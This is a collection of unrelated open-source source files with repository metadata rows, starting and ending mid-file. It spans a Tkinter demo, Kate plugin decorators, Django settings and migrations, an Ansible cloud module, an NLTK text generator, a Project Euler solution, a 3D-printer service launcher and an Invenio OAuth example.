img2 = Tkinter.PhotoImage("frameBorder", data="""
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""")
style = ttk.Style()
style.element_create("RoundedFrame", "image", "frameBorder",
("focus", "frameFocusBorder"), border=16, sticky="nsew")
style.layout("RoundedFrame", [("RoundedFrame", {"sticky": "nsew"})])
style.configure("TEntry", borderwidth=0)
frame = ttk.Frame(style="RoundedFrame", padding=10)
frame.pack(fill='x')
frame2 = ttk.Frame(style="RoundedFrame", padding=10)
frame2.pack(fill='both', expand=1)
entry = ttk.Entry(frame, text='Test')
entry.pack(fill='x')
entry.bind("<FocusIn>", lambda evt: frame.state(["focus"]))
entry.bind("<FocusOut>", lambda evt: frame.state(["!focus"]))
text = Tkinter.Text(frame2, borderwidth=0, bg="white", highlightthickness=0)
text.pack(fill='both', expand=1)
text.bind("<FocusIn>", lambda evt: frame2.state(["focus"]))
text.bind("<FocusOut>", lambda evt: frame2.state(["!focus"]))
root.mainloop()
| teeple/pns_server | work/install/Python-2.7.4/Demo/tkinter/ttk/roundframe.py | Python | gpl-2.0 | 5,601 |
# -*- coding: utf-8 -*-
# This file is part of Pate, Kate' Python scripting plugin.
#
# Copyright (C) 2013 Alex Turbov <i.zaufi@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) version 3.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with this library; see the file COPYING.LIB. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
'''Decorators used in plugins to handle document events'''
import sys
from PyQt4 import QtCore
from ..api import kDebug
from ..document_view_helpers import _make_sure_subscribers_queue_exists, _on_view_created, _SubscriberInfo
def _queue_document_event_subscriber(signal, receiver):
'''Helper function to register a new handler'''
plugin = sys._getframe(2).f_globals['__name__']
_make_sure_subscribers_queue_exists(plugin, _on_view_created, 'document_event_subscribers')
_on_view_created.document_event_subscribers[plugin].append(_SubscriberInfo(signal, receiver))
#
# Document events to subscribe from plugins
#
# http://api.kde.org/4.x-api/kdelibs-apidocs/interfaces/ktexteditor/html/classKTextEditor_1_1Document.html
#
# TODO Add more inherited signals?
#
def aboutToClose(receiver):
_queue_document_event_subscriber(
'aboutToClose(KTextEditor::Document*)'
, receiver
)
return receiver
def aboutToReload(receiver):
_queue_document_event_subscriber(
'aboutToReload(KTextEditor::Document*)'
, receiver
)
return receiver
def documentNameChanged(receiver):
_queue_document_event_subscriber(
'documentNameChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def documentSavedOrUploaded(receiver):
_queue_document_event_subscriber(
'documentSavedOrUploaded(KTextEditor::Document*, bool)'
, receiver
)
return receiver
def documentUrlChanged(receiver):
_queue_document_event_subscriber(
'documentUrlChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def exclusiveEditEnd(receiver):
_queue_document_event_subscriber(
'exclusiveEditEnd(KTextEditor::Document*)'
, receiver
)
return receiver
def exclusiveEditStart(receiver):
_queue_document_event_subscriber(
'exclusiveEditStart(KTextEditor::Document*)'
, receiver
)
return receiver
def highlightingModeChanged(receiver):
_queue_document_event_subscriber(
'highlightingModeChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def modeChanged(receiver):
_queue_document_event_subscriber(
'modeChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def modifiedChanged(receiver):
_queue_document_event_subscriber(
'modifiedChanged(KTextEditor::Document*)'
, receiver
)
return receiver
def reloaded(receiver):
_queue_document_event_subscriber(
'reloaded(KTextEditor::Document*)'
, receiver
)
return receiver
def textChanged(receiver):
_queue_document_event_subscriber(
'textChanged(KTextEditor::Document*, const KTextEditor::Range&, const QString&, const KTextEditor::Range&)'
, receiver
)
return receiver
def textInserted(receiver):
_queue_document_event_subscriber(
'textInserted(KTextEditor::Document*, const KTextEditor::Range&)'
, receiver
)
return receiver
def textRemoved(receiver):
_queue_document_event_subscriber(
'textRemoved(KTextEditor::Document*, const KTextEditor::Range&, const QString&)'
, receiver
)
return receiver
def viewCreated(receiver):
_queue_document_event_subscriber(
'viewCreated(KTextEditor::Document*, KTextEditor::View*)'
, receiver
)
return receiver
| hlamer/kate | addons/kate/pate/src/kate/document/decorators.py | Python | lgpl-2.1 | 4,321 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('bufftracker', '0007_auto_20150530_0053'),
]
operations = [
migrations.AlterModelOptions(
name='casterlevelformula',
options={'ordering': ('displayed_formula',)},
),
]
| Ernir/bufftracker | bufftracker/migrations/0008_auto_20150829_1933.py | Python | mit | 399 |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: profitbricks_volume_attachments
short_description: Attach or detach a volume.
description:
- Allows you to attach or detach a volume from a ProfitBricks server. This module has a dependency on profitbricks >= 1.0.0
version_added: "2.0"
options:
datacenter:
description:
- The datacenter in which to operate.
required: true
server:
description:
- The name of the server you wish to detach or attach the volume.
required: true
volume:
description:
- The volume name or ID.
required: true
subscription_user:
description:
- The ProfitBricks username. Overrides the PB_SUBSCRIPTION_ID environment variable.
required: false
subscription_password:
description:
- THe ProfitBricks password. Overrides the PB_PASSWORD environment variable.
required: false
wait:
description:
- wait for the operation to complete before returning
required: false
default: "yes"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 600
state:
description:
- Indicate desired state of the resource
required: false
default: 'present'
choices: ["present", "absent"]
requirements: [ "profitbricks" ]
author: Matt Baldwin (baldwin@stackpointcloud.com)
'''
EXAMPLES = '''
# Attach a Volume
- profitbricks_volume_attachments:
datacenter: Tardis One
server: node002
volume: vol01
wait_timeout: 500
state: present
# Detach a Volume
- profitbricks_volume_attachments:
datacenter: Tardis One
server: node002
volume: vol01
wait_timeout: 500
state: absent
'''
import re
import time
HAS_PB_SDK = True
try:
from profitbricks.client import ProfitBricksService
except ImportError:
HAS_PB_SDK = False
from ansible.module_utils.basic import AnsibleModule
uuid_match = re.compile(
r'[\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12}', re.I)
def _wait_for_completion(profitbricks, promise, wait_timeout, msg):
if not promise:
return
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time():
time.sleep(5)
operation_result = profitbricks.get_request(
request_id=promise['requestId'],
status=True)
if operation_result['metadata']['status'] == "DONE":
return
elif operation_result['metadata']['status'] == "FAILED":
raise Exception(
'Request failed to complete ' + msg + ' "' + str(
promise['requestId']) + '" to complete.')
raise Exception(
'Timed out waiting for async operation ' + msg + ' "' + str(
promise['requestId']
) + '" to complete.')
def attach_volume(module, profitbricks):
"""
Attaches a volume.
This will attach a volume to the server.
module : AnsibleModule object
profitbricks: authenticated profitbricks object.
Returns:
True if the volume was attached, false otherwise
"""
datacenter = module.params.get('datacenter')
server = module.params.get('server')
volume = module.params.get('volume')
# Locate UUID for Datacenter
if not (uuid_match.match(datacenter)):
datacenter_list = profitbricks.list_datacenters()
for d in datacenter_list['items']:
dc = profitbricks.get_datacenter(d['id'])
if datacenter == dc['properties']['name']:
datacenter = d['id']
break
# Locate UUID for Server
if not (uuid_match.match(server)):
server_list = profitbricks.list_servers(datacenter)
for s in server_list['items']:
if server == s['properties']['name']:
server= s['id']
break
# Locate UUID for Volume
if not (uuid_match.match(volume)):
volume_list = profitbricks.list_volumes(datacenter)
for v in volume_list['items']:
if volume == v['properties']['name']:
volume = v['id']
break
return profitbricks.attach_volume(datacenter, server, volume)
def detach_volume(module, profitbricks):
"""
Detaches a volume.
This will remove a volume from the server.
module : AnsibleModule object
profitbricks: authenticated profitbricks object.
Returns:
True if the volume was detached, false otherwise
"""
datacenter = module.params.get('datacenter')
server = module.params.get('server')
volume = module.params.get('volume')
# Locate UUID for Datacenter
if not (uuid_match.match(datacenter)):
datacenter_list = profitbricks.list_datacenters()
for d in datacenter_list['items']:
dc = profitbricks.get_datacenter(d['id'])
if datacenter == dc['properties']['name']:
datacenter = d['id']
break
# Locate UUID for Server
if not (uuid_match.match(server)):
server_list = profitbricks.list_servers(datacenter)
for s in server_list['items']:
if server == s['properties']['name']:
server= s['id']
break
# Locate UUID for Volume
if not (uuid_match.match(volume)):
volume_list = profitbricks.list_volumes(datacenter)
for v in volume_list['items']:
if volume == v['properties']['name']:
volume = v['id']
break
return profitbricks.detach_volume(datacenter, server, volume)
def main():
module = AnsibleModule(
argument_spec=dict(
datacenter=dict(),
server=dict(),
volume=dict(),
subscription_user=dict(),
subscription_password=dict(no_log=True),
wait=dict(type='bool', default=True),
wait_timeout=dict(type='int', default=600),
state=dict(default='present'),
)
)
if not HAS_PB_SDK:
module.fail_json(msg='profitbricks required for this module')
if not module.params.get('subscription_user'):
module.fail_json(msg='subscription_user parameter is required')
if not module.params.get('subscription_password'):
module.fail_json(msg='subscription_password parameter is required')
if not module.params.get('datacenter'):
module.fail_json(msg='datacenter parameter is required')
if not module.params.get('server'):
module.fail_json(msg='server parameter is required')
if not module.params.get('volume'):
module.fail_json(msg='volume parameter is required')
subscription_user = module.params.get('subscription_user')
subscription_password = module.params.get('subscription_password')
profitbricks = ProfitBricksService(
username=subscription_user,
password=subscription_password)
state = module.params.get('state')
if state == 'absent':
try:
(changed) = detach_volume(module, profitbricks)
module.exit_json(changed=changed)
except Exception as e:
module.fail_json(msg='failed to set volume_attach state: %s' % str(e))
elif state == 'present':
try:
attach_volume(module, profitbricks)
module.exit_json()
except Exception as e:
module.fail_json(msg='failed to set volume_attach state: %s' % str(e))
if __name__ == '__main__':
main()
| tsdmgz/ansible | lib/ansible/modules/cloud/profitbricks/profitbricks_volume_attachments.py | Python | gpl-3.0 | 7,795 |
import nltk, os, sys
from nltk.corpus import PlaintextCorpusReader
class ASOIFGenerator:
def __init__(self):
curr_dir = os.getcwd()
# didn't include self folder in git,
# because i'm not looking to get a cease and desist notice
wordlists = PlaintextCorpusReader(curr_dir+"/ASOIAF/", ".*\.txt")
self.words = wordlists.words()
# get cfg tri and bigrams
trigrams = nltk.trigrams(self.words)
self.cfd_t = nltk.ConditionalFreqDist()
for t in list(trigrams):
self.cfd_t[t[0]+"|"+t[1]][t[2]] += 1
bigrams = nltk.bigrams(self.words)
self.cfd_b = nltk.ConditionalFreqDist(bigrams)
#
# use bigram only to generate
#
def generate_bigram_dumb(self, word0, n=15):
for i in range(n):
print(word0)
word0 = self.cfd_b[word0].max()
#
# use bigram and then trigram to generate
#
def generate_bigram(self, word0, n=15):
word1 = self.cfd_b[word0].max()
self.generate_trigram(word0, word1, n)
#
# use trigram to generate
#
def generate_trigram(self, word0, word1, n=15):
print(word0)
for i in range(n):
print(word1)
word2 = self.cfd_t[word0+"|"+word1].max()
word0 = word1
word1 = word2
| rharriso/nltk-workspace | ASOIF_trigram_gen.py | Python | apache-2.0 | 1,336 |
#!/usr/bin/env python3
import math
def multinomial(n, digits=7):
n=str(n).zfill(digits)
temp={}
for i in n:
if not i in temp:
temp[i]=0
temp[i]+=1
out=math.factorial(digits)
for i in temp:
out//=math.factorial(temp[i])
return out
def Memoize(func):
cache={}
def inner(n):
n=scrub(n)
if not n in cache:
cache[n]=func(n)
return cache[n]
return inner
def square_digit_sum(n):
n=str(n)
return sum(int(i)**2 for i in n)
def scrub(n):
n=[i for i in str(n) if not i=="0"]
n.sort()
return int("".join(n))
@Memoize
def arrives_at_89(n):
while True:
if n==1:
return False
elif n==89:
return True
n=square_digit_sum(n)
def wrapper(n):
n=square_digit_sum(n)
return arrives_at_89(n)
def pre_requisites(n):
a=int(n**0.5)
for i in range(1,a+1):
if ((n-i**2)**0.5).is_integer():
print(i,int((n-i**2)**0.5))
def main(upper=7):
count=0
cache={}
for i in range(1, 10**upper):
i=scrub(i)
if not i in cache:
if wrapper(i):
count+=multinomial(i, upper)
cache[i]=None
return count
| Bolt64/my_code | euler/square_digit_chain.py | Python | mit | 1,255 |
#!/bin/env python
# -*- coding: utf-8; -*-
#
# (c) 2016 FABtotum, http://www.fabtotum.com
#
# This file is part of FABUI.
#
# FABUI is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# FABUI is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FABUI. If not, see <http://www.gnu.org/licenses/>.
# Import standard python module
import os
import sys
import gettext
import signal
import argparse
import logging
import time
from datetime import datetime
# Import external modules
from watchdog.observers import Observer
from ws4py.client.threadedclient import WebSocketClient
# Import internal modules
from fabtotum.utils.translation import _, setLanguage
from fabtotum.os.paths import TEMP_PATH, RUN_PATH, PYTHON_PATH
from fabtotum.fabui.config import ConfigService
from fabtotum.fabui.bootstrap import hardwareBootstrap
from fabtotum.fabui.monitor import StatsMonitor
from fabtotum.fabui.notify import NotifyService
from fabtotum.totumduino.gcode import GCodeService
from fabtotum.totumduino.hardware import reset as totumduino_reset
from fabtotum.utils.pyro.gcodeserver import GCodeServiceServer
from fabtotum.os.monitor.filesystem import FolderTempMonitor
from fabtotum.os.monitor.usbdrive import UsbMonitor
from fabtotum.os.monitor.gpiomonitor import GPIOMonitor
from fabtotum.os.monitor.configmonitor import ConfigMonitor
def create_file(filename, content=''):
with open(filename,'w') as f:
f.write(content)
os.chmod(filename, 0o660)
# www-data uid/gid are 33/33
os.chown(filename, 33, 33)
def signal_handler(signal, frame):
print "You pressed Ctrl+C!"
logger.debug("Shutting down services. Please wait...")
ws.close()
gcserver.stop()
gcservice.stop()
observer.stop()
gpioMonitor.stop()
statsMonitor.stop()
def shell_exec(cmd):
stdin,stdout = os.popen2(cmd)
stdin.close()
lines = stdout.readlines();
stdout.close()
return lines
# Setup arguments
parser = argparse.ArgumentParser()
parser.add_argument("-B", "--bootstrap", action='store_true', help="Execute bootstrape commands on startup.")
parser.add_argument("-R", "--reset", action='store_true', help="Reset totumduino on startup.")
parser.add_argument("-L", "--log", help="Use logfile to store log messages.", default='<stdout>')
parser.add_argument("-p", "--pidfile", help="File to store process pid.", default=os.path.join(RUN_PATH,'fabtotumservices.pid') )
parser.add_argument("-x", "--xmlrpc_pidfile", help="File to store xmlrpc process pid.", default=os.path.join(RUN_PATH,'xmlrpcserver.pid') )
parser.add_argument("-g", "--gpio_pidfile", help="File to store gpio monitor process pid.", default=os.path.join(RUN_PATH,'gpiomonitor.pid') )
parser.add_argument("-b", "--btagent_pidfile", help="File to store BT agent process pid.", default=os.path.join(RUN_PATH,'btagent.pid') )
parser.add_argument("--no-xmlrpc", help="Don't start XML-RPC service", action='store_true', default=False)
parser.add_argument("--no-gpiomonitor", help="Don't start GPIO monitor service", action='store_true', default=False)
parser.add_argument("--no-btagent", help="Don't start BT agetn service", action='store_true', default=False)
parser.add_argument("--no-monitor", help="Don't start Monitor service", action='store_true', default=False)
# Get arguments
args = parser.parse_args()
do_bootstrap = args.bootstrap
do_reset = args.reset
logging_facility = args.log
pidfile = args.pidfile
xmlrpc_pidfile = args.xmlrpc_pidfile
btagent_pidfile = args.btagent_pidfile
no_xmlrpc = args.no_xmlrpc
gpio_pidfile = args.gpio_pidfile
no_gpiomonitor = args.no_gpiomonitor
no_btagent = args.no_btagent
no_monitor = args.no_monitor
#myfabtotumcom_pidfile = args.myfabtotumcom_pidfile
with open(pidfile, 'w') as f:
f.write( str(os.getpid()) )
config = ConfigService()
# Load configuration
TRACE = config.get('general', 'trace')
TASK_MONITOR = config.get('general', 'task_monitor')
TEMP_MONITOR_FILE = config.get('general', 'temperature')
NOTIFY_FILE = config.get('general', 'notify_file')
LOG_LEVEL = config.get('general', 'log_level', 'INFO')
##################################################################
SOCKET_HOST = config.get('socket', 'host')
SOCKET_PORT = config.get('socket', 'port')
##################################################################
HW_DEFAULT_SETTINGS = config.get('hardware', 'settings')
##################################################################
USB_DISK_FOLDER = config.get('usb', 'usb_disk_folder')
USB_FILE = config.get('usb', 'usb_file')
##################################################################
SERIAL_PORT = config.get('serial', 'PORT')
SERIAL_BAUD = config.get('serial', 'BAUD')
##################################################################
FABID_ACTIVE = int(config.get('my.fabtotum.com', 'fabid_active', 0)) == 1
# Prepare files with correct permissions
create_file(TRACE)
create_file(TASK_MONITOR, '{"task":{"status":"terminated"}}')
create_file(TEMP_MONITOR_FILE, '{}')
create_file(NOTIFY_FILE, '{}')
# Setup logger
if LOG_LEVEL == 'INFO':
LOG_LEVEL = logging.INFO
elif LOG_LEVEL == 'DEBUG':
LOG_LEVEL = logging.DEBUG
logger = logging.getLogger('FabtotumService')
logger.setLevel(LOG_LEVEL)
if logging_facility == '<stdout>':
ch = logging.StreamHandler()
elif logging_facility == '<syslog>':
# Not supported at this point
ch = logging.StreamHandler()
else:
ch = logging.FileHandler(logging_facility)
#~ formatter = logging.Formatter("%(name)s - %(levelname)s : %(message)s")
formatter = logging.Formatter("[%(asctime)s]: %(message)s")
ch.setFormatter(formatter)
ch.setLevel(LOG_LEVEL)
logger.addHandler(ch)
if do_reset:
totumduino_reset()
time.sleep(1)
# Clear unfinished tasks
from fabtotum.database import Database
from fabtotum.database.task import Task
# Clear unfinished tasks
from fabtotum.database import Database
from fabtotum.database.task import Task
now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
db = Database()
conn = db.get_connection()
cursor = conn.execute("UPDATE sys_tasks SET status='terminated', finish_date='{0}' where status!='completed' and status!='aborted' and status!='terminated'".format(now))
conn.commit()
conn.close()
#myFabototumCom = MyFabtotumCom(gcservice, config, logger)
# Start gcode service
gcservice = GCodeService(SERIAL_PORT, SERIAL_BAUD, logger=logger, fabid=FABID_ACTIVE)
gcservice.start()
# Pyro GCodeService wrapper
gcserver = GCodeServiceServer(gcservice)
ws = WebSocketClient('ws://'+SOCKET_HOST +':'+SOCKET_PORT+'/')
ws.connect();
# Notification service
ns = NotifyService(ws, NOTIFY_FILE, config)
## Folder temp monitor
ftm = FolderTempMonitor(ns, gcservice, logger, TRACE, TASK_MONITOR)
## usb disk monitor
um = UsbMonitor(ns, logger, USB_FILE)
## Configuration monitor
cm = ConfigMonitor(gcservice, config, logger)
## The Observer ;)
observer = Observer()
observer.schedule(um, '/dev/', recursive=False)
observer.schedule(cm, '/var/lib/fabui', recursive=True)
observer.schedule(ftm, TEMP_PATH, recursive=False)
observer.start()
if do_bootstrap:
time.sleep(1)
hardwareBootstrap(gcservice, config, logger=logger)
## Safety monitor
if not no_gpiomonitor:
gpiomon_exe = os.path.join(PYTHON_PATH, 'fabtotum/os/monitor/gpiomonitor.py')
os.system('python {0} -p {1} -L /var/log/fabui/gpiomonitor.log &'.format(gpiomon_exe, gpio_pidfile) )
## Bluetooth agent
if not no_btagent:
btagent_exe = os.path.join(PYTHON_PATH, 'fabtotum/bluetooth/agent.py')
os.system('python {0} -p {1} -L /var/log/fabui/btagent.log &'.format(btagent_exe, btagent_pidfile) )
## Stats monitor
if not no_monitor:
statsMonitor = StatsMonitor(TEMP_MONITOR_FILE, gcservice, config, logger=logger)
statsMonitor.start()
# Ensure CTRL+C detection to gracefully stop the server.
signal.signal(signal.SIGINT, signal_handler)
# Start XMLRPC server
soc_id = shell_exec('</proc/cpuinfo grep Hardware | awk \'{print $3}\'')[0].strip()
rpc = None
if not no_xmlrpc:
if soc_id == 'BCM2709':
xmlrpc_exe = os.path.join(PYTHON_PATH, 'fabtotum/utils/xmlrpc/xmlrpcserver.py')
os.system('python {0} -p {1} -L /var/log/fabui/xmlrpc.log &'.format(xmlrpc_exe, xmlrpc_pidfile) )
#myfabtotumcom_exe = os.path.join(PYTHON_PATH, 'MyFabtotumCom.py')
#os.system('python {0} -p {1} -L /var/log/fabui/myfabtotumcom.log &'.format(myfabtotumcom_exe, myfabtotumcom_pidfile))
else:
from fabtotum.utils.xmlrpc.xmlrpcserver import create as rpc_create
rpc = rpc_create(gcservice, config, logging_facility, logger)
rpc.start()
# Wait for all threads to finish
gcserver.loop()
gcservice.loop()
if not no_monitor:
statsMonitor.loop()
observer.join()
#usbMonitor.join()
#gpioMonitor.join()
if rpc:
rpc.loop()
| FABtotum/colibri-fabui | fabui/ext/py/FabtotumServices.py | Python | gpl-2.0 | 9,501 |
from settings.base import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, '..', 'test.sqlite3'),
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
ELVANTO_PEOPLE_PAGE_SIZE = 10
| monty5811/elvanto_subgroups | settings/test.py | Python | mit | 354 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
r"""Minimal Flask application example for development with github handler.
SPHINX-START
1. Register a github application with `Authorization callback URL` as
`http://localhost:5000/oauth/authorized/github/`
2. Ensure you have ``github3.py`` package installed:
.. code-block:: console
$ cdvirtualenv src/invenio-oauthclient
$ pip install -e .[github]
3. Grab the *Client ID* and *Client Secret* after registering the application
and add them to your instance configuration as `consumer_key` and
`consumer_secret`.
.. code-block:: console
$ export GITHUB_APP_CREDENTIALS_KEY=my_github_client_id
$ export GITHUB_APP_CREDENTIALS_SECRET=my_github_client_secret
4. Create database and tables:
.. code-block:: console
$ pip install -e .[all]
$ cd examples
$ export FLASK_APP=github_app.py
$ ./app-setup.py
You can find the database in `examples/github_app.db`.
5. Run the development server:
.. code-block:: console
$ flask run -p 5000 -h '0.0.0.0'
6. Open in a browser the page `http://0.0.0.0:5000/github`.
You will be redirected to github to authorize the application.
Click on `Authorize application` and you will be redirected back to
`http://localhost:5000/oauth/signup/github/`, where you will be able to
finalize the local user registration, inserting email address.
Insert e.g. `fuu@bar.it` as email address and send the form.
Now, you will be again in homepage but this time it say: `hello fuu@bar.it`.
You have completed the user registration.
7. To be able to uninstall the example app:
.. code-block:: console
$ ./app-teardown.sh
SPHINX-END
"""
from __future__ import absolute_import, print_function
import os
from flask import Flask, redirect, url_for
from flask_babelex import Babel
from flask_login import current_user
from flask_menu import Menu as FlaskMenu
from flask_oauthlib.client import OAuth as FlaskOAuth
from invenio_accounts import InvenioAccounts
from invenio_accounts.views import blueprint as blueprint_user
from invenio_db import InvenioDB
from invenio_mail import InvenioMail
from invenio_userprofiles import InvenioUserProfiles
from invenio_userprofiles.views import \
blueprint_ui_init as blueprint_userprofile_init
from invenio_oauthclient import InvenioOAuthClient
from invenio_oauthclient.contrib import github
from invenio_oauthclient.views.client import blueprint as blueprint_client
from invenio_oauthclient.views.settings import blueprint as blueprint_settings
# [ Configure application credentials ]
GITHUB_APP_CREDENTIALS = dict(
consumer_key=os.environ.get('GITHUB_APP_CREDENTIALS_KEY'),
consumer_secret=os.environ.get('GITHUB_APP_CREDENTIALS_SECRET'),
)
# Create Flask application
app = Flask(__name__)
app.config.update(
SQLALCHEMY_DATABASE_URI=os.environ.get(
'SQLALCHEMY_DATABASE_URI', 'sqlite:///github_app.db'
),
OAUTHCLIENT_REMOTE_APPS=dict(
github=github.REMOTE_APP,
),
GITHUB_APP_CREDENTIALS=GITHUB_APP_CREDENTIALS,
DEBUG=True,
SECRET_KEY='TEST',
SQLALCHEMY_ECHO=False,
SECURITY_PASSWORD_SALT='security-password-salt',
MAIL_SUPPRESS_SEND=True,
TESTING=True,
USERPROFILES_EXTEND_SECURITY_FORMS=True,
)
Babel(app)
FlaskMenu(app)
InvenioDB(app)
InvenioAccounts(app)
InvenioUserProfiles(app)
FlaskOAuth(app)
InvenioOAuthClient(app)
InvenioMail(app)
app.register_blueprint(blueprint_user)
app.register_blueprint(blueprint_client)
app.register_blueprint(blueprint_settings)
app.register_blueprint(blueprint_userprofile_init)
@app.route('/')
def index():
"""Homepage."""
return 'Home page (without any restrictions)'
@app.route('/github')
def github():
"""Try to print user email or redirect to login with github."""
if not current_user.is_authenticated:
return redirect(url_for('invenio_oauthclient.login',
remote_app='github'))
return 'hello {}'.format(current_user.email)
| tiborsimko/invenio-oauthclient | examples/github_app.py | Python | mit | 4,239 |
# -*- coding: utf-8 -*-
"""Clustering utility functions."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
from copy import deepcopy
from ._history import History
from ...utils import Bunch, _as_list
#------------------------------------------------------------------------------
# Utility functions
#------------------------------------------------------------------------------
def _update_cluster_selection(clusters, up):
clusters = list(clusters)
# Remove deleted clusters.
clusters = [clu for clu in clusters if clu not in up.deleted]
# Add new clusters at the end of the selection.
return clusters + [clu for clu in up.added if clu not in clusters]
def _join(clusters):
return '[{}]'.format(', '.join(map(str, clusters)))
#------------------------------------------------------------------------------
# UpdateInfo class
#------------------------------------------------------------------------------
class UpdateInfo(Bunch):
"""Hold information about clustering changes."""
def __init__(self, **kwargs):
d = dict(
description='', # information about the update: 'merge', 'assign',
# or 'metadata_<name>'
history=None, # None, 'undo', or 'redo'
spike_ids=[], # all spikes affected by the update
added=[], # new clusters
deleted=[], # deleted clusters
descendants=[], # pairs of (old_cluster, new_cluster)
metadata_changed=[], # clusters with changed metadata
metadata_value=None, # new metadata value
